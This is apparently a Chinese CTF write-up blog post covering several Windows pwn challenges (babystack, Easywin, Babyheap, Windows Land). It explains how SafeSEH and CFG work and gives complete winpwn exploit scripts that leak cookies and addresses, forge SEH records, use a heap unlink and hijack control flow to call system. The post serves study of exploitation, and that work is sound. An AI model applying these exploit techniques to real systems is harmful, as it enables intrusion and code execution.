puts("AAAA, you kill me just because I don't think 1+1=2??");
exit(0);
}

最开始的时候,main地址和栈地址都给出了;后面的循环最多执行10次:输入”yes”可以进行一次任意地址读;输入”no”则直接跳出循环;而输入既不是”yes”也不是”no”的内容(exp中用的是”go”)时,会调用read_str(v9, 256)向只有128 bytes的v9读入数据,也就是提供一次栈溢出的机会;此外,程序还提供了getshell的后门:

1
2
.text:001B138D                 push    offset Command  ; "cmd"
.text:001B1392 call ds:system

不过由于开了SafeSEH,如果用BABYSHELLCODE的方法覆盖exception_handler,则无法通过check,所以这里需要了解一下SafeSEH在普通SEH基础上添加了什么。

SafeSEH

SafeSEH简单来说,就是在SEH的基础上,添加了额外的check。
当异常发生时,异常处理过程RtlDispatchException首先检查异常处理节点是否在栈上, 如果不在栈上程序将终止异常处理, 其次检查异常处理Handler是否在栈上, 如果在栈上程序将终止异常处理. 最后调用RtlIsValidHandler检测Handler有效性:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
/*
 * RtlIsValidHandler (pseudo-code): decides whether an SEH handler address may
 * be called. Three cases are examined in order: handler inside a loaded
 * image, handler on a non-executable page, handler outside every image.
 */
BOOL RtlIsValidHandler(handler)
{
// Case 1: the handler lies inside a loaded module's image.
if (handler is in an image) // step 1
{
if (image has the IMAGE_DLLCHARACTERISTICS_NO_SEH flag set)
return FALSE; // flag set: the image opts out of SEH, so reject

if (image has a SafeSEH table) // does the image carry a SafeSEH table?
if (handler found in the table)
return TRUE; // handler is registered in the table: accept
else
return FALSE; // handler is not in the table: reject

if (image is a .NET assembly with the ILonly flag set)
return FALSE; // IL-only .NET assembly: reject
// fall through
}

// Case 2: the handler lies on a non-executable page.
if (handler is on a non-executable page) // step 2
{
if (ExecuteDispatchEnable bit set in the process flags)
return TRUE; // DEP is off: accept; otherwise the else branch raises
else
raise ACCESS_VIOLATION; // enforce DEP even if we have no hardware NX
}

// Case 3: the handler lies outside every loaded image, on an executable page.
if (handler is not in an image) // step 3
{
if (ImageDispatchEnable bit set in the process flags)
return TRUE; // handlers outside loaded images are allowed: accept
else
return FALSE; // don't allow handlers outside of images
}

// everything else is allowed
return TRUE;
}

上面伪代码里的ExecuteDispatchEnable和ImageDispatchEnable标志用来控制Handler在不可执行内存或者不在异常模块的映像内时, 是否可以执行。默认情况下, 如果进程DEP开启, 两位为0, DEP关闭, 两位为1。

利用思路

  1. 利用任意地址读,把栈上的cookie给leak出来。
  2. 利用栈溢出,在栈上伪造一个_EH4_SCOPETABLE结构,使得FilterFunc为backdoor;同时绕过所有的check,保证异常处理流程正确执行到FilterFunc上。

从上面SEH原理分析_except_handler4_common的流程时,注意到先会检查FilterFunc是否为空再依次执行FilterFunc和HandlerFunc;但在实际调试过程中发现,即使FilterFunc == NULL,设置HandlerFunc = backdoor最终也能getshell,只是相比之下会延迟一段时间。
由于_except_handler4_common代码也是借用其他师傅博客里的,中间省略的部分也不知从何获得,所以暂时还不知道原因。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# Exploit script for babystack.exe.
# Stage 1: parse the stack and main addresses the program prints.
# Stage 2: use the arbitrary read twice to leak the frame's stack cookie and
#          the global __security_cookie.
# Stage 3: overflow the stack buffer with a fake scope table and a rewritten
#          SEH registration record pointing at it.
# Stage 4: request a read from address 1 to raise an access violation, so the
#          exception handler walks the fake scope table.
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

# Offsets within the image; rebased below using the leaked address of main.
main = 0x10b0
target = 0x139B
__security_cookie_offset = 0x4004
backdoor = 0x138D
handler = 0x1460

p = process("./babystack.exe")
# Run with the single argument "1" to attach WinDbg to the local process.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

# p = remote('node3.buuoj.cn', 26510)

p.recvuntil("stack address = 0x")
stack_address = int(p.recv(8), 16)
# The frame's cookie sits 0x80 bytes above the start of the leaked buffer.
cookie_address = stack_address + 0x80
p.recvuntil("main address = 0x")
main_address = int(p.recv(6), 16)
target_address = main_address - main + target
__security_cookie_address = main_address - main + __security_cookie_offset
backdoor_address = main_address - main + backdoor
exception_handler = main_address - main + handler

# leak cookie
p.sendlineafter("Do you want to know more?", "yes")
p.sendlineafter("Where do you want to know", str(cookie_address))
p.recvuntil("value is 0x")
cookie = int(p.recv(8), 16)

# leak __security_cookie
p.sendlineafter("Do you want to know more?", "yes")
p.sendlineafter("Where do you want to know", str(__security_cookie_address))
p.recvuntil("value is 0x")
__security_cookie = int(p.recv(8), 16)

# fake scope table
# Any answer other than "yes"/"no" reaches the 256-byte read.
p.sendlineafter("Do you want to know more?", "go")
# 4 filler bytes, so the fake scope table starts at stack_address + 4.
payload = "AAAA"
# | __security_cookieCookieOffset | __security_cookieCookieXorOffset | EHCookieOffset | EHCookieXorOffset |
payload += p32(0xffffffe4) + p32(0) + p32(0xffffff20) + p32(0)
# | EnclosingLevel | FilterFunc | HandlerFunc |
payload += p32(0xfffffffe) + p32(0) + p32(backdoor_address)
payload = payload.ljust(0x80, 'A')   # padding
payload += p32(cookie)               # cookie
payload += p32(0) * 2                # padding
# | next | exception_handler | scope_table ^ security_cookie | TryLevel |
payload += p32(stack_address + 0xd4) + p32(exception_handler) + p32(__security_cookie ^ (stack_address + 4)) + p32(0)

p.sendline(payload)
# Trigger the exception: reading from address 1 faults.
p.sendlineafter("Do you want to know more?", 'yes')
p.sendlineafter("Where do you want to know", '1')

p.interactive()

[Windows][Insomni’hack Teaser 2017]Easywin

题目分析

首先winchecksec一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  winchecksec.exe .\easywin.exe
Results for: .\easywin.exe
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation : "Present"
NX : "Present"
SEH : "Present"
CFG : "Present"
RFG : "NotPresent"
SafeSEH : "NotApplicable"
GS : "Present"
Authenticode : "NotPresent"
.NET : "NotPresent"

需要注意的是这里开启了CFG保护,至于CFG保护的原理后文会提到。

题目逻辑比较简单,主要是add中:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
// ...
do
{
while (1)
{
printf("Type?\n");
printf(" d - Droideka\n b - B1 Battle Droid\n p - Probe Droid\n i - IG-88\n~~~~~~~~~~~~~~~~~~~~~~\n");
scanf("%c", v9);
getchar();
if (v9[0] == 'b')
break;
switch (v9[0])
{
case 'd':
strcpy_s(v5 + 256, 0x100ui64, "[+] A Droideka lands on %1$s (%2$d, %3$d).\n");
*((_QWORD *)v5 + 64) = func_msg1;
goto LABEL_30;
case 'i':
strcpy_s(v5 + 256, 0x100ui64, "[+] IG-88 has a bounty of %$2d%$3d$ on planet %$1s.\n");
*((_QWORD *)v5 + 64) = func_msg2;
goto LABEL_30;
case 'p':
strcpy_s(v5 + 256, 0x100ui64, "[+] Probe Droid arrived on planet %$1s after %$2d days and %$3d hours...\n");
*((_QWORD *)v5 + 64) = func_msg3;
goto LABEL_30;
}
printf("Invalid type.\n");
v8 = 1;
}
strcpy_s(v5 + 256, 0x100ui64, "[+] An army of %$3d%$2d B1 Battle Droid arrives on %$1s.\n");
*((_QWORD *)v5 + 64) = func_msg4;
LABEL_30:;
} while (v8);
// ...

这里在偏移0x200的位置放置了一个函数指针,在attack功能中会被调用:

1
2
3
4
5
6
7
8
9
10
// ...
if ( v5 && *(_QWORD *)(v2 + 512) )
{
v8 = rand() % 100;
v9 = rand();
printf((char *)(v2 + 0x100), v2, (unsigned int)(v9 % 100), v8);
result = (*(__int64 (__fastcall **)(__int64))(v2 + 0x200))(v2);
continue;
}
// ...

首先,这个调用的参数正好是buffer本身;其次,其buffer中包含格式化字符串。
同时,很容易发现,在edit中:

1
2
3
4
5
6
7
8
9
10
v2 = (__int64)fgets(v0, 0x208, v1);
if ( v2 )
{
v2 = -1i64;
do
++v2;
while ( v0[v2] );
if ( v2 && v0[v2 - 1] == 10 )
v0[v2 - 1] = 0;
}

这里是可以写入0x208 bytes数据的,也就是说直接给了一个覆盖函数指针的操作;同时配合attack中的格式化字符串,还可以进行一次leak,需要注意的是,windows下是无法通过”%n”这种操作完成任意地址写的,”$”也无法使用。

Windows CFG(Control Flow Guard)

简单来说,CFG通过在间接跳转前插入校验代码,检查目标地址是否合法,从而可以阻止程序控制流被劫持到非预期的地方。
而从细节上讲,比如:

1
2
3
4
5
6
.text:00007FF6862A17BD                 mov     rbx, [rdi+200h]
.text:00007FF6862A17C4 mov rcx, rbx
.text:00007FF6862A17C7 call cs:__guard_check_icall_fptr
.text:00007FF6862A17CD mov rcx, rdi
.text:00007FF6862A17D0 call rbx
.text:00007FF6862A17D2 jmp short loc_7FF6862A17E3

这里需要call rbx,不过首先需要通过__guard_check_icall_fptr对rbx的位置进行一个校验。
而在win10里,这个__guard_check_icall_fptr的实现其实就是ntdll!LdrpValidateUserCallTarget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * LdrpValidateUserCallTarget (IDA decompilation): CFG check for an indirect
 * call target. Looks up the CFGBitmap entry for func_addr and tests one or
 * two bits in it; an invalid target goes to LdrpHandleInvalidUserCallTarget().
 */
unsigned __int64 __fastcall LdrpValidateUserCallTarget(unsigned __int64 func_addr)
{
__int64 bitmap; // rdx
unsigned __int64 bit_offset; // rax

// Select the bitmap entry by func_addr >> 9; the bit position is derived from func_addr >> 3.
// NOTE(review): _bittest64 presumably uses bit_offset modulo 64 here — confirm against the disassembly.
bitmap = CFGBitmap[func_addr >> 9];
bit_offset = func_addr >> 3;
// Target not 0x10-aligned: both the even bit and the odd bit of the pair must be set.
if ( (func_addr & 0xF) != 0 )
{
bit_offset &= 0xFFFFFFFFFFFFFFFEui64;
if ( !_bittest64(&bitmap, bit_offset) )
return LdrpHandleInvalidUserCallTarget();
LABEL_5:
bit_offset |= 1ui64;
if ( _bittest64(&bitmap, bit_offset) )
return bit_offset;
return LdrpHandleInvalidUserCallTarget();
}
// Target is 0x10-aligned: the first bit is enough; if it is clear, fall back to the odd bit at LABEL_5.
if ( !_bittest64(&bitmap, bit_offset) )
goto LABEL_5;
return bit_offset;
}

简单来说,这个check流程就是:

  1. func_addr >> 9得到对应CFGBitmap数组的下标,这里的原因是:

    • CFGBitmap原理是8 bytes对应1 bit,换句话说,就是8 bytes的虚拟地址空间是用CFGBitmap中的1 bit标记的;所以这里需要右移3。

    • CFGBitmap数组是以QWORD单位存的,故bitmap也是以8 bytes也就是64 bit取的,进行判断的时候下标最大为2^6-1,即需要6 bit表示下标;所以这里需要右移6。

    • 所以最后func_addr >> 9才得到对应CFGBitmap数组的下标。

      综上,被check的func_addr实际上被分为了三个部分:

      1
      2
      3
      4
      5
      +---------------------+------------------+--------+
      | 55 bits | 6 bits | 3 bits |
      +---------------------+------------------+--------+
      | offset in CFGBitmap | offset in bitmap | left |
      +---------------------+------------------+--------+
  2. 如果func_addr的低4 bits不为0,也就是func_addr不是0x10对齐的,就会同时检查两个bit,一个是bit_offset & 0xFFFFFFFFFFFFFFFE,一个是bit_offset | 1,举个例子:

    • 如果func_addr = 0x101,那么检查bit_offset = 0x20以及bit_offset = 0x21;

    • 如果func_addr = 0x10F,那么检查bit_offset = 0x20以及bit_offset = 0x21;

      换句话说,在func_addr没有0x10对齐的情况下,最后判断的相应的bitmap中的bit是同样的,故结果也是同样的。
      且只有在这两个bit均为1的情况下,才能通过检查,否则都会判为无效,从而转入异常处理,也不会进行跳转。

  3. 如果func_addr的低4 bits为0,也就是func_addr是0x10对齐的,那么会先后检查bit_offset和bit_offset | 1,举个例子:

    • 如果func_addr = 0x100,那么检查bit_offset = 0x20;如果此时bit_offset对应的bit为0,则再给一次机会,检查bit_offset | 1对应的bit是否为1;如果为1,那么目标地址有效,否则无效。

    换句话说,在func_addr是0x10对齐的情况下,只要bit_offset和bit_offset | 1的其中一个对应的bit是1,那么目标地址都是有效的。

  4. 至于为何这里涉及了两个bit的检查,就不得而知了。

而至于CFGBitmap是如何生成的,涉及到比较复杂的细节
对于动态链接库dll中的一些导出函数,其在CFGBitmap中对应的bit都是共享的,也就是说要么都合法,要么都不合法。
而若仅仅针对当前进程,则有几个比较重要的相关结构,在_load_config_used中可以看到:

1
2
3
4
.rdata:00007FF6862A3830                 dq offset __guard_check_icall_fptr ; GuardCFCheckFunctionPointer
.rdata:00007FF6862A3838 dq offset __guard_dispatch_icall_fptr ; GuardCFDispatchFunctionPointer
.rdata:00007FF6862A3840 dq offset __guard_fids_table ; GuardCFFunctionTable
.rdata:00007FF6862A3848 dq 0Eh ; GuardCFFunctionCount
  • __guard_check_icall_fptr:前面已经提到过,实际指向ntdll!LdrpValidateUserCallTarget,做具体的检查。
  • __guard_dispatch_icall_fptr:实际上就只是jmp rax,不知作何用。
  • __guard_fids_table:该进程合法的跳转地址,也就是一个函数指针表,在程序加载的时候会完成从该RVA列表到具体CFGBitmap中对应bit的转化。
  • GuardCFFunctionCount:即RVA列表中函数指针的个数。

利用思路

  1. 首先利用上述提到的格式化字符串漏洞,leak出ucrtbase的基地址。注意由于windows程序和linux不一样,其运行的加载基址貌似在相当长的一段时间里是不会变化的(或许是不重启机器就不会变),dll的加载地址也是如此;所以一次leak,全程受用。
  2. 之后利用edit的溢出,覆盖函数指针为system,并布置buffer为”type,pwn\westworld.txt”,调用attack就会将flag打印出来。这里直接system("cmd.exe")弹了shell后无法交互,所以只能直接读flag了。
    这里还有个点就是,因为我们是没法输入空格的,所以”type flag.txt”这样的字符串是输不进去的,所以利用了一个小小的trick,也就是”type,flag.txt”中”,”在这里可以等同于空格来使用,完成这个bypass。
  3. 这里可以通过调试,跟到LdrpValidateUserCallTarget中进行判断,system确实是合法地址;而至于为什么system是合法地址,这里猜测dll的导出函数可能都会是合法的跳转地址,但是无法进行验证;这样,CFG的保护在这里似乎就没有什么作用了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Exploit script for easywin.exe.
# The leak stage (commented out below) uses the format string stored at offset
# 0x100 of a record to print a ucrtbase pointer; its result is hard-coded.
# The attack stage overwrites the function pointer at offset 0x200 with
# system and places the command string at the start of the record, which is
# passed as the first argument when the pointer is called.
from winpwn import *
import sys

context.arch = 'amd64'
context.log_level = 'debug'

p = process("./easywin.exe")
# p = remote("node3.buuoj.cn", 27068)

# Run with the single argument "1" to attach WinDbg to the local process.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

def choose(choice):
    """Answer the main menu prompt."""
    p.sendlineafter("Choice? ", choice)

def add(content, item):
    """Menu 'a': create a record with target planet `content` and droid type `item`."""
    choose('a')
    p.sendlineafter("Target planet? ", content)
    p.sendlineafter("Type?", item)

def edit(idx, content):
    """Menu 'c': overwrite record idx with raw `content` (sent without a newline)."""
    choose('c')
    p.sendlineafter("ID? ", str(idx))
    p.sendafter("New target planet? ", content)

def delete(idx):
    """Menu 'd': delete record idx."""
    choose('d')
    p.sendlineafter("ID? ", str(idx))

def attack():
    """Send the menu input that triggers the attack routine."""
    choose('ll')

# add('AAA', 'd')
# edit(0, 'A' * 0xff + '\x00' + "%p" * 5 + "ucrtbase.dll:%p" + context.newline)
# attack()
# p.recvuntil('ucrtbase.dll:')
# ucrtbase = int(p.recv(16), 16) - 0xE59F8
# Hard-coded result of the leak above.
ucrtbase = 0x7ffe46b20000
system = ucrtbase + 0xA40C0

add('AAA', 'd')
# Layout: command string padded to 0x100 | 0xff filler bytes + NUL (format
# string area) | new function pointer at offset 0x200.
edit(0, 'type,pwn\\westworld.txt'.ljust(0x100, "\x00") + 'A' * 0xff + "\x00" + p64(system))
attack()

print("[+] ucrtbase: " + hex(ucrtbase))

p.interactive()

[Windows][OGeek2019]BabyHeap & [Windows][ASIS 2017]Babyheap

题目分析

传统的菜单题,其中add、delete、show都没有问题,只有edit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
else if (chunk_status[dwBytes])
{
v16 = 0;
puts("And what's the length this time?");
if (scanf("%d", &v16) != 1)
goto LABEL_49;
getchar();
puts("Then name it again : ");
v11 = v16;
v4 = 0;
v13 = chunk_array[dwBytes];
v9 = getchar();
do
{
if (v9 == 10)
break;
v13[v4++] = v9;
v9 = getchar();
} while (v4 != v11);
}

显然存在一个heap overflow。

利用思路

  1. 由于edit功能没有自动在末尾补”\x00”,所以可以通过这个leak出下一个chunk头,它是被Encoding xor加密过的,我们可以通过手动还原出原chunk头然后跟加密过的头进行xor,从而得到Encoding;同样地可以leak出heap地址。因为这个heap是通过hHeap = HeapCreate(1u, 0x2000u, 0x2000u);单独申请的,所以仅供当前线程使用,因此布局可预测,比较简单。
  2. 不同在于,linux下heap overflow通过覆盖fd,来劫持fastbin或者tcache bin的链表,达到任意地址写的目的。windows下的freelist是一个双向链表,所以要通过类似于unsorted bin的unlink attack进行利用,从而获得一个指向自己的指针。
  3. 通过提供的shoot功能,我们要将该chunk对应的chunk_status中的标志置为1,从而使得可写,进而达到任意地址读写的目的。
  4. 有了任意地址读写,就可以利用如下的一条leak链:
    1
    IAT ==> kernel32 ==> ntdll ==> ntdll!PebLdr - 0x44 ==> PEB ==> TEB ==> StackBase ==> return address
    从而找到main函数的返回地址在栈上的位置。
  5. 接下来就是覆盖返回地址执行system("cmd.exe")了。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
from winpwn import *
import sys

# Target is a 32-bit binary; 'debug' makes winpwn log all traffic.
context.arch = 'i386'
context.log_level = 'debug'

# p = process("./babyheap.exe")
p = remote("node3.buuoj.cn", 29639)

# Pass "1" as the only command-line argument to attach WinDbg before exploiting.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

def choose(choice):
    """Answer the main-menu prompt with the numeric option `choice`."""
    p.sendlineafter("What's your choice?", str(choice))

def add(size, content):
    """Menu option 1: send `size` at the length prompt, then `content` at the name prompt."""
    choose(1)
    p.sendlineafter("How long is your sword?", str(size))
    p.sendlineafter("Well done! Name it!", content)

def delete(idx):
    """Menu option 2: ask the target to destroy the entry at index `idx`."""
    choose(2)
    p.sendlineafter("Which sword do you want to destroy?", str(idx))

def edit(idx, size, content):
    """Menu option 3: rewrite entry `idx`, announcing `size` bytes and sending `content`.

    `content` is sent with sendlineafter, so a line terminator follows it.
    """
    choose(3)
    p.sendlineafter("Which one will you polish?", str(idx))
    p.sendlineafter("And what's the length this time?", str(size))
    p.sendlineafter("Then name it again : ", content)

def show(idx):
    """Menu option 4: request entry `idx` and consume output up to "Show : ".

    The caller reads the entry's content from `p` afterwards.
    """
    choose(4)
    p.sendlineafter("Which one will you check?", str(idx))
    p.recvuntil("Show : ")

def quit():
    """Menu option 5: leave the menu loop (shadows the builtin `quit`)."""
    choose(5)

def shoot(addr):
    """Hidden menu option 1337: send `addr` (as decimal text) at the target prompt."""
    choose(1337)
    p.sendlineafter("So what's your target?", str(addr))

def get_pie():
    """Parse the hex address printed after the gift banner and subtract 0x1090.

    Returns the rebased value; the script uses it as the image base of the
    target binary (0x1090 is specific to this binary).
    """
    p.recvuntil("And here is your Novice village gift : 0x")
    # [:-2] drops the last two characters of the line (the line ending).
    pie = int(p.recvline()[:-2], 16) - 0x1090
    return pie

def ctor_heap_head(size, flags, prev_size, remain_size):
    """Pack an (unencoded) 8-byte heap chunk header into one integer.

    `size` and `prev_size` are byte counts and are stored in 8-byte units.
    Bit layout of the result: size units at bit 0, `flags` at bit 16, the
    checksum at bit 24, prev_size units at bit 32 and `remain_size` at bit 56.
    The checksum is low byte of the size units XOR its high part XOR `flags`.
    """
    chksum = ((size >> 3) & 0xff) ^ ((size >> 3) >> 8) ^ flags
    val = (size >> 3) | (flags << 16) | (chksum << 24) | (prev_size >> 3 << 32) | (remain_size << 56)
    return val

def leak_info(chunk_array, addr):
    """Read up to 4 bytes at `addr` through the self-referencing slot.

    Entry 1 is rewritten with `chunk_array + 4` followed by `addr`; the script
    relies on entry 1 pointing at its own slot so that this makes entry 2
    point at `addr`. Entry 2 is then shown and its output decoded as a
    little-endian u32 (short output is NUL-padded on the right).
    """
    edit(1, 0x8, p32(chunk_array + 4) + p32(addr))
    show(2)
    val = u32(p.recvline()[:-2].ljust(4, "\x00")[:4])
    return val

# Addresses inside the target image, derived from the leaked base.
PIE = get_pie()
chunk_array = PIE + 0x4370
chunk_status = PIE + 0x43BC
puts_iat = PIE + 0x30C8
heapfree_iat = PIE + 0x3004
ret_from_main = PIE + 0x193b

# create five chunks
add(0x68, "AAA") # chunk 0
add(0x68, "BBB") # chunk 1
add(0x68, "CCC") # chunk 2
add(0x68, "DDD") # chunk 3
add(0x68, "EEE") # chunk 4

# leak heap head and calculate encoding
edit(1, 0x68, "B" * 0x60 + "heaphead")
show(1)
p.recvuntil("heaphead")
heap_head = u64(p.recv(6) + '\x00\x08')
encoding = heap_head ^ ctor_heap_head(0x70, 0x01, 0x70, 0x08)

# leak freelist address
edit(1, 0x76, "B" * 0x6E + "freelist")
show(1)
p.recvuntil("freelist")
# Pad on the right: the leak is little-endian, so missing bytes are the high
# ones (left padding would shift a short leak into the wrong positions).
freelist = u32(p.recvline()[:-2].ljust(4, "\x00")[:4]) + 0xc0

# fix chunk 2 head
edit(1, 0x70, "B" * 0x68 + p64(heap_head))

# unlink attack
delete(1)
delete(3)
edit(0, 0x78, 'A' * 0x68 + p64(ctor_heap_head(0x70, 0x00, 0x70, 0x00) ^ encoding) + p32(chunk_array) + p32(chunk_array + 4))
delete(0)

# now chunk_array[1] points to itself
# leak address
shoot(chunk_status + 1)
ucrtbase = leak_info(chunk_array, puts_iat) - 0x95A30 #0xb48d0
system = ucrtbase + 0xB8320 #0xec730
kernel32 = leak_info(chunk_array, heapfree_iat) - 0x13FC0 #0x1df60
kernel32_atol = kernel32 + 0x81800 #0x81B70

# leak ntdll
ntdll = leak_info(chunk_array, kernel32_atol) - 0x72980 #0x76870
ntdll_peb_addr = ntdll + 0x10eb84 #0x125d34

# leak peb and teb
PEB = leak_info(chunk_array, ntdll_peb_addr) - 0x44
TEB = PEB + 0x3000

# leak stack address
# Reading at TEB + 6 and shifting left by 16 rebuilds a 64 KiB-aligned value
# from the upper two bytes of the dword at TEB + 4.
stack_end = leak_info(chunk_array, TEB + 6) << 16

# find where return address is stored
# Walk downwards one dword at a time until the saved return address of main
# is found. NOTE(review): the loop has no lower bound.
ret_addr_pos = stack_end - 4
while True:
    if leak_info(chunk_array, ret_addr_pos) == ret_from_main:
        break
    else:
        ret_addr_pos -= 4

# hijack ret address
edit(1, 0x14, p32(chunk_array + 4) + p32(ret_addr_pos) + p32(0) + "cmd.exe\x00")
edit(2, 0x10, p32(system) + p32(0) + p32(chunk_array + 0x10))

# getshell
quit()

print("[+] PIE base is: " + hex(PIE))
print("[+] Encoding is: " + hex(encoding))
print("[+] Freelist address is: " + hex(freelist))
print("[+] ucrtbase address is: " + hex(ucrtbase))
print("[+] kernel32 address is: " + hex(kernel32))
print("[+] ntdll address is: " + hex(ntdll))
print("[+] PEB address is: " + hex(PEB))
print("[+] TEB address is: " + hex(TEB))
print("[+] stack_end address is: " + hex(stack_end))
print("[+] return address lies on: " + hex(ret_addr_pos))
print("[+] system address is: " + hex(system))

p.interactive()

[Windows][HITCON 2018]Windows Land

题目分析

典型的菜单题,但是比较繁杂,总的来说,就是有五种操作:

1
2
3
4
5
create
list
edit
delete
exit

以及五个操作对象:

1
2
3
4
5
1) Teacher
2) Engineer
3) Doctor
4) Athlete
5) Pig

由于是C++程序,仔细分析可以发现,五种对象都是以vector形式存储的,增删通过相应的push_back和erase进行。

而其中比较与众不同的是Engineer,它的成员里包含一个动态分配的指针,也就是language成员变量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
// create function

// ...
printf("What language> ");
v41 = 0i64;
// Read the language one byte at a time into info_buf: a newline (10) is
// replaced by a NUL and ends the input; otherwise reading stops once 0x100
// bytes have been stored (no NUL is written in that case).
while ( read(0, &DstBuf, 1u) > 0 )
{
if ( (_BYTE)DstBuf == 10 )
{
*((_BYTE *)info_buf + v41) = 0;
break;
}
*((_BYTE *)info_buf + v41++) = DstBuf;
if ( v41 >= 0x100 )
break;
}
// Fill the local record (v55..v60) that is handed to the vector helpers below.
v56 = 0i64;
v57 = age;
v55 = name_buf[0];
v58 = 0i64;
v59 = (&carrier_array)[carrier_idx];
v60 = salary;
// Only a non-empty language gets a buffer: random_padding + 512 bytes are
// allocated and the first 23 bytes of info_buf (16 + 4 + 2 + 1) are copied in.
if ( LOBYTE(info_buf[0]) )
{
v0 = (unsigned __int64)malloc((unsigned int)(unsigned __int8)random_padding + 512);
v58 = v0;
*(_OWORD *)v0 = info_buf[0];
*(_DWORD *)(v0 + 16) = info_buf[1];
*(_WORD *)(v0 + 20) = WORD2(info_buf[1]);
v42 = BYTE6(info_buf[1]);
*(_BYTE *)(v0 + 22) = BYTE6(info_buf[1]);
}
// When the end pointer equals the capacity pointer the first helper is used
// (presumably the growing insert path - confirm); otherwise the second helper
// is called on the end slot and the end pointer advances by 48 bytes.
if ( (void *)engineer_array_capacity == *(&engineer_array_start + 1) )
{
sub_7FF6C3CF3740(v42, *(&engineer_array_start + 1), &v55);
v0 = v58;
}
else
{
sub_7FF6C3CF1130(*(&engineer_array_start + 1), &v55);
*(&engineer_array_start + 1) = (char *)*(&engineer_array_start + 1) + 48;
}
// The local language buffer is released once the record has been handed over.
if ( v0 )
free((void *)v0);
break;
// ...

这里先malloc后free的是一个局部变量,在push_back的过程中会进行拷贝,也就是会再分配一个同样大小的buffer作为language,并把0x18 bytes的数据复制进去。

而漏洞存在于:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
// edit function

// ...
rsi14 = rsi13 - 1;
if (!rsi14)
{
rdi50 = 0i64;
// Number of elements: (end - start) / 48, i.e. each element is 48 bytes.
r10_50 = ((_BYTE *)*(&engineer_array_start + 1) - (_BYTE *)engineer_array_start) / 48;
if (r10_50)
{
// Linear search: rdi50 is the element index, r9_51 its byte offset.
for (r9_51 = 0i64;; r9_51 += 48i64)
{
rax52 = (unsigned __int8 *)engineer_array_start + r9_51;
// Inlined string compare of the bytes at the element start against
// info_buf; edx53 == 0 after the loop means the two strings are equal.
do
{
ecx53 = rax52[(char *)info_buf - ((_BYTE *)engineer_array_start + r9_51)];
edx53 = *rax52 - ecx53;
if (edx53)
break;
++rax52;
} while (ecx53);
if (!edx53)
break;
if (++rdi50 >= r10_50)
return printf("edit failed\n");
}
printf("What language> ");
memset(info_buf, 0, sizeof(info_buf));
// Same byte-wise input loop as in create: newline ends the input, at most
// 0x100 bytes are stored.
while (read(0, DstBuf, 1u) > 0)
{
if (DstBuf[0] == 10)
{
*((_BYTE *)info_buf + rbx1) = 0;
break;
}
*((_BYTE *)info_buf + rbx1++) = DstBuf[0];
if (rbx1 >= 0x100)
break;
}
// QWORD index 6 * rdi50 + 3 is byte offset 24 inside the matched element.
rcx64 = (_DWORD *)*((_QWORD *)engineer_array_start + 6 * rdi50 + 3);
if (LOBYTE(info_buf[0]))
{
if (rcx64) // uaf here
{
// 23 bytes (16 + 4 + 2 + 1) are written through the stored pointer,
// whether or not it was freed by an earlier empty edit.
eax66 = info_buf[1];
*(_OWORD *)rcx64 = info_buf[0];
rcx64[4] = eax66;
*((_WORD *)rcx64 + 10) = WORD2(info_buf[1]);
*((_BYTE *)rcx64 + 22) = BYTE6(info_buf[1]);
}
else
{
sub_7FF6C3CF11D0((__int64)engineer_array_start + 48 * rdi50, (__int64)info_buf);
}
}
else if (rcx64)
{
// Empty input: the buffer is freed but the pointer inside the element is
// left unchanged.
free(rcx64); // free but not set zero
return printf("edit succeed\n");
}
return printf("edit succeed\n");
}
return printf("edit failed\n");
}
// ...

也就是在editEngineer->language的时候,如果第一个字节为”\x00”,那么就会直接触发free,但是并不会置为0(当然正常地edit也是可以的,但是只能写0x18 bytes到buffer里面)。所以,这里存在UAF可以利用。

利用思路

